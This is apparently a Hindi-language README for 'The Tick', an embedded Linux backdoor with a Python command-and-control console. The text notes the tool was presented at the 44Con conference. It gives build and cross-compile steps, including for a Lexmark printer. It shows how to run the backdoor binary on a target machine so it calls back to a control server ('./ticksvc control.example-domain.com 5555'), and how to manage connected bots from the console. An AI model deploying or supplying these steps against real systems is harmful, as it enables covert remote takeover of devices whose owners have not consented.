
A simple embedded Linux backdoor.
एक सरल एम्बेडेड Linux बैकडोर।

The Tick केवल libcurl पर निर्भर करता है, इसलिए सुनिश्चित करें कि आपके पास संबंधित डेवलपमेंट पैकेज है। उदाहरण के लिए Debian-आधारित वितरणों पर आप निम्न कार्य करेंगे:
sudo apt-get install libcurl-dev
निर्भरताएँ स्थापित हो जाने के बाद बस makefile चलाएँ:
cd src
make clean
make
जब "make" कमांड पूर्ण रूप से चल जाए, संकलित बाइनरी "bin" फ़ोल्डर में पाई जा सकती है। यह वह बाइनरी है जिसे आप अपने लक्षित मशीन पर चलाना चाहते हैं ताकि उसे दूरस्थ रूप से नियंत्रित किया जा सके।
समर्थित प्लेटफ़ॉर्म के लिए क्रॉस-कंपाइलिंग करते समय, निर्भरता समाधान और संकलन आपके लिए स्वचालित रूप से किया जाता है। वर्तमान में एकमात्र समर्थित क्रॉस-कंपाइलिंग प्लेटफ़ॉर्म Lexmark CX310DN प्रिंटर है, लेकिन बाद में और डिवाइस जोड़े जाएँगे। अधिक विवरण के लिए makefile देखें।
कमांड एंड कंट्रोल कंसोल Python में लिखा गया है और इसलिए इसे संकलित करने की आवश्यकता नहीं है।
बैकडोर पर पर्सिस्टेंस प्राप्त करना काफी हद तक लक्षित प्लेटफ़ॉर्म पर निर्भर करेगा, और इसलिए इसका यहाँ दस्तावेज़ीकरण नहीं किया गया है।
लक्षित मशीन पर, बैकडोर बाइनरी को निम्नलिखित तर्कों के साथ चलाएँ:
./ticksvc ADDR PORT
जहाँ "ADDR" और "PORT" को उस IP पते और पोर्ट से बदला जाना चाहिए जहाँ कमांड एंड कंट्रोल कंसोल सुन रहा होगा। डिफ़ॉल्ट पोर्ट 5555 है।
कमांड एंड कंट्रोल कंसोल को किसी स्थापना की आवश्यकता नहीं है, लेकिन इसमें अनसुलझी निर्भरताएँ हो सकती हैं। यह सुनिश्चित करने के लिए निम्न कमांड चलाएँ कि सभी निर्भरताएँ ठीक से स्थापित हैं (ध्यान दें, इसके लिए sudo की आवश्यकता नहीं है):
pip install --upgrade -r requirements.txt
अधिकांश Linux डेस्कटॉप वातावरणों में निम्नलिखित "Tick.desktop" फ़ाइल एक आइकन बनाएगी जिस पर आप कंसोल चलाने के लिए डबल-क्लिक कर सकते हैं:
[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/
Tick.desktop फ़ाइल का सटीक स्थान Linux वितरणों के अनुसार भिन्न हो सकता है, लेकिन सामान्यतः इसे डेस्कटॉप पर रखने से काम चल जाना चाहिए। सुनिश्चित करें कि आपने पथ को वहाँ संपादित किया है जहाँ आपने The Tick डाउनलोड किया है (उपरोक्त उदाहरण में /opt/thetick)।
लक्षित प्लेटफ़ॉर्म पर बैकडोर बाइनरी चलाने के लिए, नियंत्रण सर्वर होस्टनाम और पोर्ट को कमांड लाइन विकल्पों के रूप में सेट करें। उदाहरण के लिए:
./ticksvc control.example-domain.com 5555
नियंत्रण सर्वर पर, आप कंसोल को GNU screen इंस्टेंस या इसी तरह के अंदर चलाना चाह सकते हैं:
sudo apt-get install screen
screen -S thetick ./thetick.py
इस तरह आप Control+A और फिर D दबाकर कंसोल से अलग हो सकते हैं। आप बाद में इस प्रकार कंसोल पर वापस लौट सकते हैं:
screen -r thetick
जब कोई नया बॉट कंसोल से जुड़ता है तो कंसोल आपको बताएगा। वर्तमान में जुड़े बॉट्स दिखाने के लिए "bots" कमांड का उपयोग करें, और "use" कमांड काम करने के लिए एक बॉट का चयन करेगा। "help" कमांड उपयोगकर्ता मैनुअल दिखाता है।
यहाँ कुछ स्क्रीनशॉट हैं जो दर्शाते हैं कि कंसोल क्या करने में सक्षम है:


The Tick का उल्लेख निम्नलिखित 44Con प्रस्तुति में Daniel Romero और Mario Rivas द्वारा किया गया है: